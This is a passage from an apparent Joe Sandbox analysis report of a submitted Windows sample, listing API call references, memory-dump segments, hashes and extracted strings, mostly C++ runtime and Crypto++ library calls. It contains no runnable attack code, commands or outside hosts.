                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                          • String ID: pScheduler
                                          • API String ID: 3657713681-923244539
                                          • Opcode ID: e18dd4a875dba67465f1ade652af5eee6fdcee6a0add780a9395b5722a2f847f
                                          • Instruction ID: 035a7803f65bbea5498463b60ad14ac21991c0ae654ef7fe6d6610445363f1b6
                                          • Opcode Fuzzy Hash: e18dd4a875dba67465f1ade652af5eee6fdcee6a0add780a9395b5722a2f847f
                                          • Instruction Fuzzy Hash: C5F0B439A00604A7CF14EBA5E942DEEB37DBED0720710496DE50527181DBB0AD06C7A1
                                          APIs
                                          • _SpinWait.LIBCONCRT ref: 00A4C2C5
                                            • Part of subcall function 00A42302: _SpinWait.LIBCONCRT ref: 00A4231A
                                          • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 00A4C2D9
                                          • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00A4C30B
                                          • List.LIBCMT ref: 00A4C38E
                                          • List.LIBCMT ref: 00A4C39D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                          • String ID:
                                          • API String ID: 3281396844-0
                                          • Opcode ID: 88e4f74d5dcc12c3999f4d6282b44c54131d82064ed31bb9c0ec108fc6130dfd
                                          • Instruction ID: 3d899286a7de1c81883c7e1411ddabe2122b6680e69a6eaacb47a51430734b17
                                          • Opcode Fuzzy Hash: 88e4f74d5dcc12c3999f4d6282b44c54131d82064ed31bb9c0ec108fc6130dfd
                                          • Instruction Fuzzy Hash: EF31693A902615DFCB54EFA4D6416EDF7B0BF84324F44406AE80A7B242DB717E04CBA0
                                          APIs
                                          • SetEvent.KERNEL32(?,00000000,?), ref: 00A54C06
                                          • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00A54BEE
                                            • Part of subcall function 00A4CB06: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00A4CB27
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A54C37
                                          • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00A54C69
                                          • SwitchToThread.KERNEL32(00000005,00000004,00000000,?,?,?,?,?,?,?,00ACC368), ref: 00A54C6E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Context$Event$Base::Concurrency::details::$ThrowTrace$Exception@8SwitchThread
                                          • String ID:
                                          • API String ID: 2412095092-0
                                          • Opcode ID: 31449a2186606205910de9bb0a13b8bd3fbce0b0c0d820413ebe225527073de8
                                          • Instruction ID: 7be7f880415c91bba1c68116a55a600a4d73be56cdd24f0f2d52da9fbcce4ddb
                                          • Opcode Fuzzy Hash: 31449a2186606205910de9bb0a13b8bd3fbce0b0c0d820413ebe225527073de8
                                          • Instruction Fuzzy Hash: C6210475701214AFCB00EB98DC45E6EB7FCFB88735B004056FE15A7291CF70AD418AA5
                                          APIs
                                          • GetEnvironmentStringsW.KERNEL32(00000000,?,00000002,?,?,00A821E5,00000000,?,00000000,00000000), ref: 00A7C5AD
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00A821E5,00000000,?,00000000,00000000), ref: 00A7C5D0
                                            • Part of subcall function 00A75B94: RtlAllocateHeap.NTDLL(00000000,?,?,?,00A57B27,?,?,?,?,?,009B1F07,?,?,?), ref: 00A75BC6
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00A821E5,00000000,?,00000000,00000000), ref: 00A7C5F6
                                          • _free.LIBCMT ref: 00A7C609
                                          • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,00A821E5,00000000,?,00000000,00000000), ref: 00A7C618
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                          • String ID:
                                          • API String ID: 336800556-0
                                          • Opcode ID: 7b823c06aa36498293e18d83ede4235b4c4b4898b26cea61b5303c5b6304d9e9
                                          • Instruction ID: e995d3c97fa94abf7df316d04152ae2ae506bdb2237777cf74299cb23f993443
                                          • Opcode Fuzzy Hash: 7b823c06aa36498293e18d83ede4235b4c4b4898b26cea61b5303c5b6304d9e9
                                          • Instruction Fuzzy Hash: E5015E726016157BAB2196B65DCCC7B6A7DDBC6FA1314D12DF908D7101EE608D0281B0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Maklocstr$Maklocchr
                                          • String ID:
                                          • API String ID: 2020259771-0
                                          • Opcode ID: b2768d83cb8bd2b668e84266e9b64a8b8d2f120ca9f4315bf2f1157761f7298e
                                          • Instruction ID: 830a2c26f550ccc1cf1fbb969bc711c9815183f3146f609f71994f78da2766a7
                                          • Opcode Fuzzy Hash: b2768d83cb8bd2b668e84266e9b64a8b8d2f120ca9f4315bf2f1157761f7298e
                                          • Instruction Fuzzy Hash: 5A11C1B19407547FE720DBA8A981F12B7ECEF14350F08492AF144CB641E374FC4487A6
                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 00A386A2
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00A386AC
                                            • Part of subcall function 009B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 009B2B1D
                                            • Part of subcall function 009B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 009B2B39
                                          • std::_Facet_Register.LIBCPMT ref: 00A386FD
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00A3871D
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A3873B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                                          • String ID:
                                          • API String ID: 651022567-0
                                          • Opcode ID: 97ffbf052b5cf885984b63f869fc650b2d73768a7cb5cccd53c989ba95652fdc
                                          • Instruction ID: 21cf947d61d0193b445f3ddae4375c2ca3d1077973e5e5e80d509d0b5058b804
                                          • Opcode Fuzzy Hash: 97ffbf052b5cf885984b63f869fc650b2d73768a7cb5cccd53c989ba95652fdc
                                          • Instruction Fuzzy Hash: 351182369002289BCF05EBA4DE52AFEB7B5FF84720F240519F4116B291DF789E01C791
                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 00A38748
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00A38752
                                            • Part of subcall function 009B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 009B2B1D
                                            • Part of subcall function 009B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 009B2B39
                                          • std::_Facet_Register.LIBCPMT ref: 00A387A3
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00A387C3
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A387E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                                          • String ID:
                                          • API String ID: 651022567-0
                                          • Opcode ID: 0177f8beb2403fc075e55473f26cfe2280a63046a32ba3d86db6577da015f8b7
                                          • Instruction ID: 20b3ef4612fae28a04943b8aab185bedee7e707a3e7edca5a722c8e82059860b
                                          • Opcode Fuzzy Hash: 0177f8beb2403fc075e55473f26cfe2280a63046a32ba3d86db6577da015f8b7
                                          • Instruction Fuzzy Hash: CE1170369002289BCF05EBA4DA52AEE77B5AF84720F240519F4116B291DF789E41C791
                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 00A389E0
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00A389EA
                                            • Part of subcall function 009B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 009B2B1D
                                            • Part of subcall function 009B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 009B2B39
                                          • std::_Facet_Register.LIBCPMT ref: 00A38A3B
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00A38A5B
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A38A79
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                                          • String ID:
                                          • API String ID: 651022567-0
                                          • Opcode ID: 946bad8d070f806248f465235485fba95b0d033e29eba0ca74db3dd1376fc023
                                          • Instruction ID: 894240e38d61d33096069ba2520ad8b7f36094ab1deb033ec35fdeaee67a3d78
                                          • Opcode Fuzzy Hash: 946bad8d070f806248f465235485fba95b0d033e29eba0ca74db3dd1376fc023
                                          • Instruction Fuzzy Hash: F611C272D002289BCF05EBA4CA56AFE77B5BF84720F25041AF4117B291CF389E41CB91
                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 00A3893A
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00A38944
                                            • Part of subcall function 009B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 009B2B1D
                                            • Part of subcall function 009B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 009B2B39
                                          • std::_Facet_Register.LIBCPMT ref: 00A38995
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00A389B5
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A389D3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                                          • String ID:
                                          • API String ID: 651022567-0
                                          • Opcode ID: c848394e40ee5122a1c1723f267e99148de3a21beb98aecc697102e9d6452690
                                          • Instruction ID: c6df13ec2bd3ffde36b8e6d0981373effc72e09bdf197c6ca1e0fa8f71f5d3b7
                                          • Opcode Fuzzy Hash: c848394e40ee5122a1c1723f267e99148de3a21beb98aecc697102e9d6452690
                                          • Instruction Fuzzy Hash: F0118232A002289BCF05EBA4DA56BFE77B5FF84720F244519F5116B2A1CF789E41C791
                                          APIs
                                          • GetLastError.KERNEL32(?,?,?,00A659B8,00A75BD7,?,?,00A57B27,?,?,?,?,?,009B1F07,?,?), ref: 00A74403
                                          • _free.LIBCMT ref: 00A74438
                                          • _free.LIBCMT ref: 00A7445F
                                          • SetLastError.KERNEL32(00000000,?,?,?), ref: 00A7446C
                                          • SetLastError.KERNEL32(00000000,?,?,?), ref: 00A74475
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ErrorLast$_free
                                          • String ID:
                                          • API String ID: 3170660625-0
                                          • Opcode ID: ad8149d13f080a3d44908ca4d11a615dde3c54617319a4374354cc8a848eae57
                                          • Instruction ID: 25de8ce91bf52c391c9baf65dce233358929299e13a24370137d03fb223d26f8
                                          • Opcode Fuzzy Hash: ad8149d13f080a3d44908ca4d11a615dde3c54617319a4374354cc8a848eae57
                                          • Instruction Fuzzy Hash: FF01F4372406406B9A22A7B96D45F2B267EABC9775721C12AF41D92292EF248A066121
                                          APIs
                                          • _free.LIBCMT ref: 00A702B0
                                            • Part of subcall function 00A74D66: HeapFree.KERNEL32(00000000,00000000,?,00A7D5F8,?,00000000,?,00000000,?,00A7D89C,?,00000007,?,?,00A7DC90,?), ref: 00A74D7C
                                            • Part of subcall function 00A74D66: GetLastError.KERNEL32(?,?,00A7D5F8,?,00000000,?,00000000,?,00A7D89C,?,00000007,?,?,00A7DC90,?,?), ref: 00A74D8E
                                          • _free.LIBCMT ref: 00A702C2
                                          • _free.LIBCMT ref: 00A702D5
                                          • _free.LIBCMT ref: 00A702E6
                                          • _free.LIBCMT ref: 00A702F7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 9c023f0782a39cdc82d1fd9d77b09cb342bbf2b652a55aafff20a32c647d2f0b
                                          • Instruction ID: 7b261bbd70f6805b51a42f52351bf00fb2b5c557d12af60074fe101ffbdda480
                                          • Opcode Fuzzy Hash: 9c023f0782a39cdc82d1fd9d77b09cb342bbf2b652a55aafff20a32c647d2f0b
                                          • Instruction Fuzzy Hash: EFF0DAB58022209FDB35FFD8FD218463B61B7497A0311C11BF45E562B2D7358A438BC6
                                          APIs
                                          • ___std_exception_copy.LIBVCRUNTIME ref: 009FEFB2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ___std_exception_copy
                                          • String ID: 0$w#G!
                                          • API String ID: 2659868963-3192620746
                                          APIs
                                          • ___std_type_info_name.LIBVCRUNTIME ref: 00A10D8E
                                          • ___std_type_info_name.LIBVCRUNTIME ref: 00A10DF9
                                          Strings
                                          Similarity
                                          • API ID: ___std_type_info_name
                                          • String ID: ThisPointer:$ValueNames
                                          • API String ID: 1734802720-2375088429
                                          APIs
                                          • ___std_type_info_name.LIBVCRUNTIME ref: 00A10B9E
                                          • ___std_type_info_name.LIBVCRUNTIME ref: 00A10C09
                                          Strings
                                          Similarity
                                          • API ID: ___std_type_info_name
                                          • String ID: ThisPointer:$ValueNames
                                          • API String ID: 1734802720-2375088429
                                          APIs
                                          • _free.LIBCMT ref: 00A7B060
                                            • Part of subcall function 00A7AE50: __alloca_probe_16.LIBCMT ref: 00A7AEB9
                                            • Part of subcall function 00A7AE50: WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,?,00001004,00000000,00000000,?,00000080,00000000,00000000,?,00000080,00000000,00000000), ref: 00A7AF16
                                            • Part of subcall function 00A7AE50: __freea.LIBCMT ref: 00A7AF1F
                                          • _free.LIBCMT ref: 00A7AFB6
                                            • Part of subcall function 00A74D66: HeapFree.KERNEL32(00000000,00000000,?,00A7D5F8,?,00000000,?,00000000,?,00A7D89C,?,00000007,?,?,00A7DC90,?), ref: 00A74D7C
                                            • Part of subcall function 00A74D66: GetLastError.KERNEL32(?,?,00A7D5F8,?,00000000,?,00000000,?,00A7D89C,?,00000007,?,?,00A7DC90,?,?), ref: 00A74D8E
                                          • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00A7AFF1
                                            • Part of subcall function 00A74D09: HeapAlloc.KERNEL32(00000008,?,00000000,?,00A7442F,00000001,00000364,?,00A57B27,?,?,?,?,?,009B1F07,?), ref: 00A74D4A
                                          Strings
                                          Similarity
                                          • API ID: ErrorHeapLast_free$AllocByteCharFreeMultiWide__alloca_probe_16__freea
                                          • String ID: w#G!
                                          • API String ID: 1317440246-519468572
                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: __aullrem$Exception@8Throw
                                          • String ID: w#G!
                                          • API String ID: 4166652736-519468572
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009FC59D
                                          Strings
                                          • w#G!, xrefs: 009FC444
                                          • BlockPaddingScheme, xrefs: 009FC52D
                                          • StreamTransformationFilter: please use AuthenticatedEncryptionFilter and AuthenticatedDecryptionFilter for AuthenticatedSymmetricCipher, xrefs: 009FC577
                                          Similarity
                                          • API ID: Exception@8Throw
                                          • String ID: BlockPaddingScheme$StreamTransformationFilter: please use AuthenticatedEncryptionFilter and AuthenticatedDecryptionFilter for AuthenticatedSymmetricCipher$w#G!
                                          • API String ID: 2005118841-3480149324
                                          APIs
                                          • __EH_prolog3_GS.LIBCMT ref: 00A3B335
                                            • Part of subcall function 009E8DC0: std::_Lockit::_Lockit.LIBCPMT ref: 009E8E09
                                            • Part of subcall function 009E8DC0: std::_Lockit::_Lockit.LIBCPMT ref: 009E8E2B
                                            • Part of subcall function 009E8DC0: std::_Lockit::~_Lockit.LIBCPMT ref: 009E8E4B
                                            • Part of subcall function 009E8DC0: std::_Lockit::~_Lockit.LIBCPMT ref: 009E8F18
                                          • _Find_unchecked1.LIBCPMT ref: 00A3B3DF
                                          Strings
                                          Similarity
                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_unchecked1H_prolog3_
                                          • String ID: 0123456789-$0123456789-
                                          • API String ID: 156722996-2494171821
                                          APIs
                                          • __alloca_probe_16.LIBCMT ref: 00A7AEB9
                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,?,00001004,00000000,00000000,?,00000080,00000000,00000000,?,00000080,00000000,00000000), ref: 00A7AF16
                                          • __freea.LIBCMT ref: 00A7AF1F
                                          Strings
                                          Similarity
                                          • API ID: ByteCharMultiWide__alloca_probe_16__freea
                                          • String ID: w#G!
                                          • API String ID: 3062693170-519468572
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A10582
                                          Strings
                                          Similarity
                                          • API ID: Exception@8Throw
                                          • String ID: : Missing required parameter '$w#G!$w#G!
                                          • API String ID: 2005118841-2204151072
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A106A2
                                          Strings
                                          Similarity
                                          • API ID: Exception@8Throw
                                          • String ID: : Missing required parameter '$w#G!$w#G!
                                          • API String ID: 2005118841-2204151072
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009FEB4B
                                          Strings
                                          Similarity
                                          • API ID: Exception@8Throw
                                          • String ID: InputBuffer$StringStore: missing InputBuffer argument$w#G!
                                          • API String ID: 2005118841-226832382
                                          APIs
                                          • CreateSemaphoreA.KERNEL32(00000000,00000000,7FFFFFFF,00000000), ref: 009B5198
                                          • CreateSemaphoreA.KERNEL32(00000000,00000000,7FFFFFFF,00000000), ref: 009B51AC
                                          • CreateSemaphoreA.KERNEL32(00000000,00000000,7FFFFFFF,00000000), ref: 009B51C0
                                          Strings
                                          Similarity
                                          • API ID: CreateSemaphore
                                          • String ID: w#G!
                                          • API String ID: 1078844751-519468572
                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: __aullrem$Exception@8Throw
                                          • String ID: w#G!
                                          • API String ID: 4166652736-519468572
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009B610E
                                            • Part of subcall function 00A57E0C: RaiseException.KERNEL32(?,?,00A2538C,?,?,Dflt,?,?,?,?,?,00A2538C,?,00AC99F0,?), ref: 00A57E6C
                                          • ___std_exception_copy.LIBVCRUNTIME ref: 009B6162
                                          Strings
                                           Memory Dump Source
                                           • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ExceptionException@8RaiseThrow___std_exception_copy
                                          • String ID: Clone() is not implemented yet.$w#G!
                                          • API String ID: 640887848-701921529
                                          • Opcode ID: 86fd37f9fcfa039013af08d9891959c7e11e685d1dc577d948e34d99205b7b61
